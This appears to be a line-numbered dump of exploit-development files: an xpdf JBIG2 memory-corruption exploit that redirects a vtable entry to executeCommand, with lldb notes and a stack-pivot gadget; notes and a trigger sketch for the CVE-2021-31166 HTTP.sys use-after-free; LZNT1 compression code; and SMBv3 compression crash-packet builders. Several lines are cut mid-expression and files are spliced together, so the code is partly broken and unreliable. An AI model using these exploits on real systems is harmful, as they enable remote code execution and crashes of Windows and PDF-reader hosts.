segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xcafe + i), 1, len(grrs.raw())) 504 | f.write(grrs_sh.raw() + grrs.raw()) 505 | 506 | # restore a placeholder 507 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 508 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 509 | f.write(grrs_sh.raw() + grrs.raw()) 510 | 511 | # trigger the write with the spoofed bitmap 512 | grrs = genericRefinementRegionSegment(0x1, 0x1, (write_byte_offset << 3) + write_bit_offset, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 513 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xdeadbeef), 1, len(grrs.raw())) 514 | f.write(grrs_sh.raw() + grrs.raw()) 515 | 516 | 517 | def read_from_calculated_offset_to_offset(f, num_bits, write_byte_offset, write_bit_offset): 518 | for i in range(0, num_bits): 519 | read_bit_from_calculated_offset_to_offset(f, write_byte_offset, i + write_bit_offset) 520 | 521 | 522 | def zero_page(f): 523 | # zero page 524 | for i in range(0, 0x80, 0x4): 525 | replace_bytes_at_offset(f, struct.pack(" rdx 650 | # set to 0x41 to test reading negative offsets 651 | 
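    # (annotation) the helpers above form the bit-copy "weird machine": each 1x1
    # refinement region reads or writes a single bit of the groomed buffer, the
    # 0x1f-segment rotation plants the buffer's own heap address in the segment
    # list so a spoofed bitmap can be dereferenced through it, and or/and/replace
    # give the masked and unconditional stores used here to assemble the fake
    # structures and register values.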
replace_bytes_at_offset(f, struct.pack("I", 0xc0ffee), 1, len(grrs.raw())) 674 | f.write(grrs_sh.raw() + grrs.raw()) 675 | 676 | grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_bitmap_data + 3 - (i // 8)) << 3) + (i % 8), 0, 0, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 677 | grrs_sh = segmentHeader(0xcafe + i, STORE, 0, 1, len(grrs.raw())) 678 | f.write(grrs_sh.raw() + grrs.raw()) 679 | 680 | # append segment (brings list up to 0x20), will overwrite this pointer in the segment list 681 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 682 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 683 | f.write(grrs_sh.raw() + grrs.raw()) 684 | 685 | for i in range(0, 0x1f): 686 | # write buffer address into list 687 | grrs = genericRefinementRegionSegment(0x1, 0x1, (((data_buffer_to_segments + (0x8 * (0x1f - i))) + 0x3 - (i // 8) ) << 3) + (i % 8), 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 688 | #grrs = genericRefinementRegionSegment(0x1, 0x1, ((data_buffer_to_segments + (0x8 * (0x1f - i))) << 3) + i, 0, REPLACE, 2, [0,0], [0,0], b"\xff\x7f\xff\xac") 689 | grrs_sh = segmentHeaderWithRefSegsLarge(0xffffffff, COMBINE, 0xE0000001, b"\x00" + struct.pack(">I", 0xcafe + i), 1, len(grrs.raw())) 690 | f.write(grrs_sh.raw() + grrs.raw()) 691 | 692 | # restore a placeholder 693 | grrs = genericRefinementRegionSegment(0x1, 0x1, garbage_bit, 0, 0, 0, [0,0], [0,0], b"\xff\x7f\xff\xac") 694 | grrs_sh = segmentHeader(0xc0ffee, STORE, 0, 1, len(grrs.raw())) 695 | f.write(grrs_sh.raw() + grrs.raw()) 696 | 697 | # trigger the write with the spoofed bitmap 698 | replace_bytes_at_offset(f, struct.pack("I", 0xdeadbeef), 1, len(grrs.raw())) 707 | f.write(grrs_sh.raw() + grrs.raw()) 708 | f.write(toggle_debug_sh.raw()) 709 | 710 | 711 | f.write(debug_sh.raw()) 712 | f.write(final_debug_sh.raw()) 713 | 714 | # write 715 | """ 716 | (lldb) x/5a 0x1001645e8 (vtable) 717 | 0x1001645e8: 0x00000001000a1d10 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 718 | 0x1001645f0: 0x00000001000a1d20 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 719 | 0x1001645f8: 0x00000001000aab70 xpdf`JBIG2Bitmap::getType() at JBIG2Stream.cc:692 720 | 721 | executeCommand is 0x819C0 under JBIG2Bitmap::getType() 722 | add 0xFFFFFFFFFFF7E640 to emulate subtraction (lol) 723 | 724 | 1 match found in /Users/jeff/Desktop/shared/xpdf-4.03-clean/build/xpdf-qt/xpdf: 725 | Address: xpdf[0x00000001000291b0] (xpdf.__TEXT.__text + 137232) 726 | Summary: xpdf`executeCommand(char*) at gfile.cc:531 727 | 728 | (lldb) x/5a 0x01001645e8 729 | 0x1001645e8: 0x00000001000a1d10 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 730 | 0x1001645f0: 0x00000001000a1d20 xpdf`JBIG2Bitmap::~JBIG2Bitmap() at JBIG2Stream.cc:763 731 | 0x1001645f8: 0x00000001000aab70 xpdf`JBIG2Bitmap::getType() at JBIG2Stream.cc:692 732 | 0x100164600: 0x0000000000000000 733 | 734 | executeCommand is 0x819C0 under JBIG2Bitmap::getType() 735 | above getType() 736 | 737 | gadget to stack pivot... now how to get data onto stack? 
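[annotation] checking the arithmetic above: getType() sits at 0x1000aab70 and
executeCommand(char*) at 0x1000291b0, a difference of 0x819C0; adding the
two's-complement constant 0xFFFFFFFFFFF7E640 (= 2**64 - 0x819C0) to the slot is
what "emulates subtraction" when redirecting the vtable entry.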
738 | 0x0000000100040fd7 : pop rsp ; ret 739 | 740 | """ 741 | 742 | 743 | 744 | """ 745 | replace_bytes_at_offset(f, struct.pack("()<->()->* 19 | 20 | processes the entire string "aa, bb, cc, etc," 21 | nodes are allocated for unknown content-codings in the paged memory pool 22 | 23 | allocated nodes are freed in all but one case immediately by 24 | UlFreeUnknownCodingList using the ORIGINAL ROOT NODE (the one on the stack) 25 | 26 | after parsing all content-codings specified, if there are additional nodes 27 | in the unknown content-codings list, the nodes are unlinked from the root node 28 | and relinked to another root node in an internal structure (Request). 29 | The original root nodes next and previous links aren't reset 30 | 31 | IS: 32 | request->root: 33 | *<-(old_prev)<->(new_root)<->(old_next)->* 34 | original root: 35 | *<-(old_prev)<->(root)<->(old_next)->* 36 | SHOULD BE: 37 | request->root: 38 | *<-(old_prev)<->(root)<->(old_next)->* 39 | original root: 40 | (root)<->(root)<->(root) 41 | 42 | 43 | a content-coding string containing just "," will throw error 44 | 0x0c0000225. The unknown content-coding list is migrated to 45 | the request struct before the error is handled. 46 | The entry into UlFreeUnknownCodingList is where the first free, 47 | and the use after free, occur 48 | 49 | UlFreeUnknownCodingList: 50 | frees nodes in the order they were added to the list (head->next->...tail) 51 | starts with the first non-root node, so head->next 52 | 53 | This function is called on the original root, which has broken next and prev 54 | pointers 55 | (request->root) 56 | /|\ 57 | | 58 | \|/ 59 | *<-(old_prev)<->(root)->(old_next)->* 60 | /|\ 61 | | 62 | freeing 63 | 64 | HTTP!UlFreeUnknownCodingList unlinks this node from the internal structure root 65 | node instead of the passed in the original root node. 66 | 67 | (request->root) 68 | 69 | *<-(old_prev)<->(root)->(old_next)->* 70 | /|\ 71 | | 72 | freeing 73 | 74 | The node is free, integrity checks are performed, but they fail. 75 | Previous of old_next points to request->root. old_next is up for freeing 76 | again. BEFORE the free, sanity checking sees that the previous node 77 | is the original root, but the original root's next is old_next_next 78 | (after unlinking old_next)/ old_next is used (after freed) for sanity checks, 79 | they fail, and the kernel panics 80 | 81 | Can you generate this error with a list of length 1? root would point to root 82 | after the free? 83 | 84 | Can't generate error with list of length 1 85 | 86 | After looking at this, I don't see how this could be exploited. 87 | Even locally, if you could somehow control the memory of the free node 88 | (very fast process, small window to get the memory reassigned), you'd 89 | also have to have an info leak (for remote) to pass the sanity check during 90 | unlinking. All in all this does not seem like a good bug to exploit, 91 | but I realize that there may be things I don't know. Excited to see if 92 | someone pushes this further. 93 | 94 | """ 95 | """ 96 | https://github.com/0vercl0k/CVE-2021-31166 97 | The bug itself happens in http!UlpParseContentCoding where the function has 98 | a local LIST_ENTRY and appends item to it. When it's done, it moves it into 99 | the Request structure; but it doesn't NULL out the local list. The issue 100 | with that is that an attacker can trigger a code-path that frees 101 | every entries of the local list leaving them dangling in the Request object. 
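
[annotation, not part of the quoted write-up above] a minimal trigger sketch,
assuming the header shape implied by the notes in this file (several unknown
content-codings followed by an empty element); the helper name and header value
are illustrative and not the original PoC:

    import requests

    def send_trigger(target):
        # unknown codings ending with an empty element walk the code path that
        # frees the migrated unknown-coding list and leaves it dangling
        headers = {"Accept-Encoding": "AAAA, BBBB, CCCC, ,"}
        try:
            requests.get(f"http://{target}/", headers=headers, timeout=5)
        except requests.exceptions.RequestException:
            pass  # an unpatched target may bugcheck instead of answering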
102 | 103 | """ 104 | """ 105 | parser = argparse.ArgumentParser('Poc for CVE-2021-31166: remote UAF in HTTP.sys') 106 | parser.add_argument('--target', required = True) 107 | args = parser.parse_args() 108 | """ 109 | 110 | """ 111 | jeff bug notes 112 | 113 | free aparently in UlpParseContentCoding 114 | 115 | crash occurs in 2nd call to UlFreeUnknownCodingList in 116 | UlpParseAcceptEncoding. 117 | 118 | bug is use after free, it seems that a double free 119 | on the same LIST_ENTRY causes this bugcheck/crash 120 | 121 | only 4 calls to UlFreeUnknownCodingList 122 | only one of them hits on the crash, so use after free is coming from a call directly 123 | to ExFreePoolWithTag 124 | 125 | to find first free, break on every free and check if buffer contains our header content 126 | 127 | bp nt!ExFreePoolWithTag ".if (@retreg == dodgyVal) {db rcx;} .else {gc}" 128 | ^ this method did not work, I ended up trying the conditional: 129 | .if (@rcx != 0) { as /ma ${/v:EventName} @rcx } .else { ad /q ${/v:EventName} } 130 | .if ($spat(@"${EventName}", "AAAA*") == 0) { gc } .else { .echo EventName } 131 | 132 | now turning on heap asan and seeing where that gets me 133 | "C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\gflags.exe" /k +hpa +ust 134 | 135 | UlpParseContentCoding(*char headerText, 13, null, null, ) 136 | pointer to string of header text 137 | 138 | 139 | mov r10, qword ptr [HTTP!_imp_ExFreePoolWithTag (fffff803`28535c38)] ds:002b:fffff803`28535c38={nt!ExFreePool (fffff803`229b1010)} 140 | 141 | bp HTTP!UlpHandleRequest 142 | bp nt!ExFreeHeapPool "$$> i & 1): 13 | out += chunk[0:1] 14 | chunk = chunk[1:] 15 | else: 16 | flag = struct.unpack('= 0x10: 21 | l_mask >>= 1 22 | o_shift -= 1 23 | pos >>= 1 24 | 25 | length = (flag & l_mask) + 3 26 | offset = (flag >> o_shift) + 1 27 | 28 | if length >= offset: 29 | tmp = out[-offset:] * int(0xFFF / len(out[-offset:]) + 1) 30 | out += tmp[:length] 31 | else: 32 | out += out[-offset:-offset+length] 33 | chunk = chunk[2:] 34 | if len(chunk) == 0: 35 | break 36 | return out 37 | 38 | def decompress(buf, length_check=True): 39 | out = bytes() 40 | while buf: 41 | header = struct.unpack(' len(buf[2:]): 44 | raise ValueError('invalid chunk length') 45 | else: 46 | chunk = buf[2:2+length] 47 | if header & 0x8000: 48 | out += _decompress_chunk(chunk) 49 | else: 50 | out += chunk 51 | buf = buf[2+length:] 52 | 53 | return out 54 | 55 | def _find(src, target, max_len): 56 | result_offset = 0 57 | result_length = 0 58 | for i in range(1, max_len): 59 | offset = src.rfind(target[:i]) 60 | if offset == -1: 61 | break 62 | tmp_offset = len(src) - offset 63 | tmp_length = i 64 | if tmp_offset == tmp_length: 65 | tmp = src[offset:] * int(0xFFF / len(src[offset:]) + 1) 66 | for j in range(i, max_len+1): 67 | offset = tmp.rfind(target[:j]) 68 | if offset == -1: 69 | break 70 | tmp_length = j 71 | if tmp_length > result_length: 72 | result_offset = tmp_offset 73 | result_length = tmp_length 74 | 75 | if result_length < 3: 76 | return 0, 0 77 | return result_offset, result_length 78 | 79 | def _compress_chunk(chunk): 80 | blob = copy.copy(chunk) 81 | out = bytes() 82 | pow2 = 0x10 83 | l_mask3 = 0x1002 84 | o_shift = 12 85 | while len(blob) > 0: 86 | bits = 0 87 | tmp = bytes() 88 | for i in range(8): 89 | bits >>= 1 90 | while pow2 < (len(chunk) - len(blob)): 91 | pow2 <<= 1 92 | l_mask3 = (l_mask3 >> 1) + 1 93 | o_shift -= 1 94 | if len(blob) < l_mask3: 95 | max_len = len(blob) 96 | else: 97 | max_len = l_mask3 98 | 99 | offset, length = 
_find(chunk[:len(chunk) - len(blob)], blob, max_len) 100 | 101 | # try to find more compressed pattern 102 | offset2, length2 = _find(chunk[:len(chunk) - len(blob)+1], blob[1:], max_len) 103 | if length < length2: 104 | length = 0 105 | 106 | if length > 0: 107 | symbol = ((offset-1) << o_shift) | (length - 3) 108 | tmp += struct.pack('> (7 - i)) 118 | out += tmp 119 | 120 | return out 121 | 122 | def compress(buf, chunk_size=0x1000): 123 | out = bytes() 124 | while buf: 125 | chunk = buf[:chunk_size] 126 | compressed = _compress_chunk(chunk) 127 | if len(compressed) < len(chunk): # chunk is compressed 128 | flags = 0xB000 129 | header = struct.pack('I",len(data)) 74 | self.data = data 75 | self.bytes = self.size + self.data 76 | 77 | def raw(self): 78 | return self.size + self.data 79 | 80 | 81 | class SMBSessionSetup: 82 | SECURITY_BLOB = b"\x4e\x54\x4c\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x31\x90\x88\xe2" \ 83 | b"\x00\x00\x00\x00\x28\x00\x00\x00\x00\x00\x00\x00\x28\x00\x00\x00" \ 84 | b"\x06\x01\xb1\x1d\x00\x00\x00\x0f" 85 | 86 | def __init__(self, flags, security_mode, capabilities, channel, blob_offset, 87 | blob_length, previous_session_id, security_blob): 88 | self.structure_size = b"\x19\x00" 89 | self.flags = flags 90 | self.security_mode = security_mode 91 | self.capabilities = capabilities 92 | self.channel = channel 93 | self.previous_session_id = previous_session_id 94 | self.blob_offset = blob_offset 95 | self.blob_length = blob_length 96 | self.security_blob = security_blob 97 | 98 | def raw(self): 99 | return self.structure_size + self.flags + self.security_mode + self.capabilities + \ 100 | self.channel + self.blob_offset + self.blob_length + self.previous_session_id + \ 101 | self.security_blob 102 | 103 | 104 | class SMBCompressionTransformHeader: 105 | def __init__(self, protocol_id, original_size, compression_algorithm, reserve, offset): 106 | self.protocol_id = protocol_id 107 | self.original_size = original_size 108 | self.compression_algorithm = compression_algorithm 109 | self.reserve = reserve 110 | self.offset = offset 111 | 112 | def raw(self): 113 | return self.protocol_id + self.original_size + self.compression_algorithm + \ 114 | self.reserve + self.offset 115 | 116 | 117 | ######################################## 118 | # Packet contructors 119 | ######################################## 120 | 121 | def CrashPacket(): 122 | # data is necessary for crash 123 | data = b'A' * 0xffff 124 | h = SMBCompressionTransformHeader( 125 | b"\xfc\x53\x4d\x42", # protocol_id 126 | struct.pack("